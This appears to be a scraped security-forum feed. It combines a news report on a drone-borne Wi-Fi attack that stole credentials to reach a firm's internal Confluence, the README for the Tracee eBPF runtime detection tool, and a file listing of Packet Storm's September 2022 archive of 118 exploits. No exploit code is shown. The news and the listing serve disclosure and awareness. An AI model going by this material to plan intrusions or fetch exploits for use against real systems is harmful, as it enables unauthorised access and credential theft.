firm spotted unusual activity on its internal Atlassian Confluence page that originated from within the company's network. The company's security team responded and found that the user whose MAC address was used to gain partial access to the company Wi-Fi network was also logged in at home several miles away. That is to say, the user was active off-site but someone within Wi-Fi range of the building was trying to wirelessly use that user's MAC address, which is a red flag. The team then took steps to trace the Wi-Fi signal and used a Fluke system to identify the Wi-Fi device. "This led the team to the roof, where a 'modified DJI Matrice 600' and a 'modified DJI Phantom' series were discovered," Linares explained. The Phantom drone was in fine condition and had a modified Wi-Fi Pineapple device, used for network penetration testing, according to Linares. The Matrice drone was carrying a case that contained a Raspberry Pi, several batteries, a GPD mini laptop, a 4G modem, and another Wi-Fi device. It had landed near the building's heating and ventilation system and appeared to be damaged but still operable. "During their investigation, they determined that the DJI Phantom drone had originally been used a few days prior to intercept a worker's credentials and Wi-Fi," Linares said. "This data was later hard coded into the tools that were deployed with the Matrice." According to Linares, the tools on the drones were used to target the company's internal Confluence page in order to reach other internal devices using the credentials stored there. The attack, he said, had limited success and is the third cyberattack involving a drone he's seen over the past two years. "The attackers specifically targeted a limited access network, used by both a third-party and internally, that was not secure due to recent changes at the company (e.g. restructuring/rebranding, new building, new building lease, new network setup or a combination of any of these scenarios)," Linares told The Register. "This is the reason why this temporary network unfortunately had limited access in order to login (credentials + MAC security). The attackers were using the attack in order to access an internal IT confluence server that contained other credentials for accessing other resources and storing IT procedures." Long-term problem comes to life Linares said he had worked on a drone project in 2011 to test network attack capabilities and at the time, power, carry weight, and range were limiting factors. "We revisited it again in 2015 and drone tech had come a long way," he said. "Now in 2022 we are seeing really amazing drone advancements in power, range, and capabilities (for instance, the amazing synchronized drone shows that China puts out are utterly fantastic)." "This paired with drone payload options getting smaller and more capable – e.g. Flipper Zero kit – ... make viable attack packages that are reasonable to deploy," said Linares. "Targets in fintech/crypto and supply chain or critical third-party software suppliers would make ideal targets for these attacks where an attacker can easily cover their initial operating costs with immediate financial gain or access to more lucrative targets." Via theregister.com
-
Armitage?
-
Sterge cache si cookies
-
Coreea de nord.are blur in G map PS: n-am auzit video
-
Tracee is a Runtime Security and forensics tool for Linux. It uses Linux eBPF technology to trace your system and applications at runtime, and analyzes collected events in order to detect suspicious behavioral patterns. It is usually delivered as a docker container, but there are other ways you can use it (even create your own customized tracee container). Watch a quick video demo of Tracee: Check out the Tracee video hub for more videos. Documentation The full documentation of Tracee is available at https://aquasecurity.github.io/tracee/dev. You can use the version selector on top to view documentation for a specific version of Tracee. Quickstart Before you proceed, make sure you follow the minimum requirements for running Tracee. 1. Running tracee:latest docker run \ --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ aquasec/tracee:latest 2. Running tracee:full docker run --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ -v /usr/src:/usr/src:ro \ -v /lib/modules:/lib/modules:ro \ -v /tmp/tracee:/tmp/tracee:rw \ aquasec/tracee:full The default (latest) image is lightweight and portable. It is supposed to support different kernel versions without having to build source code. If the host kernel does not support BTF then you may use the full container image. The full container will compile an eBPF object during startup, if you do not have one already cached in /tmp/tracee. You may need to change the volume mounts for the kernel headers based on your setup. See Linux Headers section for more info. Tracee supports enriching events with additional data from running containers. In order to enable this capability please look here. These docker commands run Tracee with default settings and start reporting detections to standard output. In order to simulate a suspicious behavior, you can simply run: strace ls in another terminal. This will trigger the Anti-Debugging signature, which is loaded by default, and you will get a warning: INFO: probing tracee-ebpf capabilities... INFO: starting tracee-ebpf... INFO: starting tracee-rules... Loaded 14 signature(s): [TRC-1 TRC-13 TRC-2 TRC-14 TRC-3 TRC-11 TRC-9 TRC-4 TRC-5 TRC-12 TRC-8 TRC-6 TRC-10 TRC-7] Serving metrics endpoint at :3366 Serving metrics endpoint at :4466 *** Detection *** Time: 2022-03-25T08:04:22Z Signature ID: TRC-2 Signature: Anti-Debugging Data: map[] Command: strace Hostname: ubuntu-impish Trace In some cases, you might want to leverage Tracee's eBPF event collection capabilities directly, without involving the detection engine. This might be useful for debugging, troubleshooting, analysing, researching OR education. Execute docker container with the word trace as an initial argument, and tracee-ebpf will be executed, instead of the full tracee detection engine. docker run \ --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ aquasec/tracee:latest \ trace Components Tracee is composed of the following sub-projects, which are hosted in the aquasecurity/tracee repository: Tracee-eBPF - Linux Tracing and Forensics using eBPF Tracee-Rules - Runtime Security Detection Engine Tracee is an Aqua Security open source project. Learn about our open source work and portfolio Here. Join the community, and talk to us about any matter in GitHub Discussion or Slack. Download: tracee-main.zip or git clone https://github.com/aquasecurity/tracee.git Source
-
- 1
-
This archive contains all of the 118 exploits added to Packet Storm in September, 2022. Content: Directory of \202209-exploits\2209-exploits 10/03/2022 02:30 AM <DIR> . 10/03/2022 02:30 AM <DIR> .. 09/26/2022 06:21 PM 2,414 activeecomcms630-disclose.txt 09/26/2022 06:22 PM 1,997 activeecomcms630-xss.txt 09/09/2022 06:54 PM 560 airdisk755-xss.txt 09/13/2022 06:37 PM 1,679 alms57-shell.txt 09/08/2022 05:47 PM 4,663 apache_spark_rce_cve_2022_33891.rb.txt 09/09/2022 06:48 PM 976 atdrive28-lfi.txt 09/09/2022 07:02 PM 1,836 avevaitaasg-traversal.txt 09/26/2022 06:39 PM 17,852 beagent_sha_auth_rce.rb.txt 09/22/2022 07:01 PM 8,319 bitbucket_git_cmd_injection.rb.txt 09/20/2022 05:03 PM 2,374 blink1control2227-insecure.txt 09/20/2022 04:52 PM 840 bookwyrm043-bypass.txt 09/26/2022 06:26 PM 6,255 brw131-xss.txt 09/20/2022 04:57 PM 2,835 buffalotsnas166-bypass.txt 09/29/2022 06:11 PM 2,338 buspms10-xss.txt 09/05/2022 06:17 PM 6,438 cisco_asax_sfr_rce.rb.txt 09/23/2022 05:08 PM 3,009 feehicms211-exec.txt 09/07/2022 08:06 PM 1,083 fefileexplorer1104-lfi.txt 09/27/2022 06:42 PM 2,003 foms10-sql.txt 09/07/2022 07:50 PM 6,781 ftpmanager82-lfitraversal.txt 09/19/2022 05:52 PM 1,387 genesyspureconnect-xss.txt 09/15/2022 05:01 PM 9,013 gitea1166-exec.rb.txt 09/09/2022 06:35 PM 5,328 GS20220909153445.tgz 09/09/2022 06:38 PM 4,460 GS20220909153743.tgz 09/09/2022 06:41 PM 6,293 GS20220909154008.tgz 09/09/2022 06:43 PM 14,914 GS20220909154254.tgz 09/09/2022 06:45 PM 8,544 GS20220909154511.tgz 09/09/2022 06:50 PM 13,201 GS20220909154932.tgz 09/09/2022 06:52 PM 14,092 GS20220909155201.tgz 09/09/2022 06:58 PM 13,135 GS20220909155726.tgz 09/09/2022 07:00 PM 19,227 GS20220909155928.tgz 09/09/2022 07:06 PM 14,832 GS20220909160551.tgz 09/09/2022 07:10 PM 4,120 GS20220909160817.tgz 09/16/2022 04:40 PM 4,699 GS20220916134029.tgz 09/20/2022 05:07 PM 4,312 GS20220920140731.tgz 09/20/2022 05:12 PM 4,275 GS20220920141211.tgz 09/20/2022 05:15 PM 9,631 GS20220920141404.tgz 09/20/2022 05:19 PM 4,955 GS20220920141716.tgz 09/22/2022 06:56 PM 9,880 GS20220922155445.tgz 09/12/2022 06:47 PM 5,800 infixlms430-inject.txt 09/12/2022 06:48 PM 4,613 infixlms430-shell.txt 09/29/2022 06:12 PM 6,307 joomlaadsmanager320-sql.txt 09/30/2022 05:55 PM 5,944 joomladjclassifiedsads39-xss.txt 09/29/2022 05:55 PM 5,356 joomlaedocman1233-xss.txt 09/28/2022 06:03 PM 5,261 joomlaeshopsc360-xss.txt 09/30/2022 05:52 PM 5,447 joomlajoomrecipe422-xss.txt 09/26/2022 06:19 PM 5,430 livelycartpro3-xss.txt 09/09/2022 06:55 PM 421 mbdrivelitewfd140-xss.txt 09/05/2022 06:03 PM 1,802 mobilemouse3604-exec.txt 09/28/2022 06:11 PM 6,116 mobile_mouse_rce.rb.txt 09/22/2022 06:45 PM 1,615 multix24-xsrf.txt 09/22/2022 06:45 PM 2,084 multix24-xss.txt 09/07/2022 07:52 PM 1,986 MVID-2022-0633.txt 09/07/2022 07:53 PM 2,151 MVID-2022-0634.txt 09/07/2022 07:57 PM 2,007 MVID-2022-0635.txt 09/07/2022 08:15 PM 3,001 MVID-2022-0636.txt 09/07/2022 07:41 PM 2,665 MVID-2022-0637.txt 09/07/2022 08:07 PM 3,754 MVID-2022-0638.txt 09/20/2022 04:50 PM 1,648 MVID-2022-0639.txt 09/20/2022 04:53 PM 2,847 MVID-2022-0640.txt 09/20/2022 05:05 PM 1,806 MVID-2022-0641.txt 09/20/2022 05:04 PM 2,430 MVID-2022-0642.txt 09/26/2022 06:24 PM 3,850 MVID-2022-0643.txt 09/26/2022 06:38 PM 2,149 MVID-2022-0644.txt 09/26/2022 06:25 PM 1,915 MVID-2022-0645.txt 09/05/2022 05:59 PM 25,764 naval.py.txt 09/28/2022 06:07 PM 8,110 netfilter_nft_set_elem_init_privesc.rb.txt 09/15/2022 05:16 PM 1,037 news247nm10-xss.txt 09/27/2022 06:46 PM 866 obcms10-idor.txt 09/27/2022 06:44 PM 1,120 obcms10-xsrf.txt 09/27/2022 06:52 PM 972 obcms10-xss.txt 09/27/2022 06:49 PM 817 obcms10persistent-xss.txt 09/26/2022 06:30 PM 2,630 odlms10-sqlbypassshell.txt 09/06/2022 07:16 PM 2,364 oelms10-xsrf.txt 09/29/2022 05:57 PM 898 oes10-sql.txt 09/29/2022 05:45 PM 743 oes10-xss.txt 09/05/2022 06:05 PM 2,547 omps10-sql.txt 09/05/2022 06:07 PM 1,084 omps10-xss.txt 09/09/2022 06:56 PM 2,025 onb2022-sql.txt 09/19/2022 05:58 PM 2,128 opencart3xncp-sql.txt 09/30/2022 05:54 PM 5,352 opencartjcart30319-xss.txt 09/26/2022 06:18 PM 5,449 oscommercesc4-xss.txt 09/19/2022 06:00 PM 3,627 owlfilesfm1201-traversal.txt 09/16/2022 04:57 PM 5,457 panos_op_cmd_exec.rb.txt 09/26/2022 06:15 PM 2,243 pfBlockerNG-RCE.py.txt 09/19/2022 06:02 PM 3,698 photosync47-lfi.txt 09/20/2022 04:59 PM 11,362 Processmaker-PoC-by-Sornram9254.py.txt 09/29/2022 06:16 PM 9,061 qdpm_authenticated_rce.rb.txt 09/13/2022 06:39 PM 6,915 rocketlms16-shell.txt 09/16/2022 04:45 PM 21,866 rocketlms16-sql.txt 09/13/2022 06:38 PM 1,824 rocketlms16-xss.txt 09/16/2022 04:52 PM 11,376 SA-20220914-0.txt 09/16/2022 05:01 PM 10,883 SA-20220915-0.txt 09/27/2022 06:54 PM 13,634 SA-20220923-0.txt 09/09/2022 06:16 PM 1,367 sacco2022-sql.txt 09/09/2022 07:16 PM 852 sagemath90-dosoverflow.txt 09/12/2022 06:45 PM 1,375 smartrg2613-exec.txt 09/16/2022 04:47 PM 1,507 ssb223-sql.txt 09/13/2022 06:52 PM 7,926 SYSS-2022-041.txt 09/23/2022 05:09 PM 617 teleport1011-exec.txt 09/23/2022 05:06 PM 687 testa351-xss.txt 09/23/2022 05:03 PM 1,219 tplinktapoc2001115-exec.txt 09/21/2022 04:50 PM 22,438 unified_remote_rce.rb.txt 09/19/2022 09:25 PM 2,380 viaviwebwallpaper-sqlshell.txt 09/06/2022 07:17 PM 1,147 wifihdwdd11-lfi.txt 09/21/2022 04:45 PM 1,127 wifimouse1834-exec.txt 09/26/2022 06:41 PM 3,264 wifi_mouse_rce.rb.txt 09/22/2022 06:52 PM 1,827 workordercms010-sql.txt 09/22/2022 06:53 PM 426 workordercms010-xss.txt 09/23/2022 05:16 PM 1,254 wp3dadyrtws10-xss.txt 09/26/2022 06:36 PM 5,119 wpforym157-xss.txt 09/14/2022 06:04 PM 3,438 wpgateway35-escalate.txt 09/19/2022 05:55 PM 701 wpgetyourguideticketing101-xss.txt 09/28/2022 06:01 PM 715 wpmotopresshbl442-xss.txt 09/02/2022 06:19 PM 1,342 wpnetroicsblogpostsgrid10-xss.txt 09/26/2022 06:32 PM 5,762 wpsabaidiscuss1413-xss.txt 09/23/2022 05:14 PM 1,631 wpuseronline2880-xss.txt 09/12/2022 06:54 PM 1,965 ZSL-2022-5711.txt 09/19/2022 06:03 PM 65,921 ZSL-2022-5712.tgz 119 File(s) 630,814 bytes Total Files Listed: 118 File(s) Download: 202209-exploits.tgz (351 KB) Source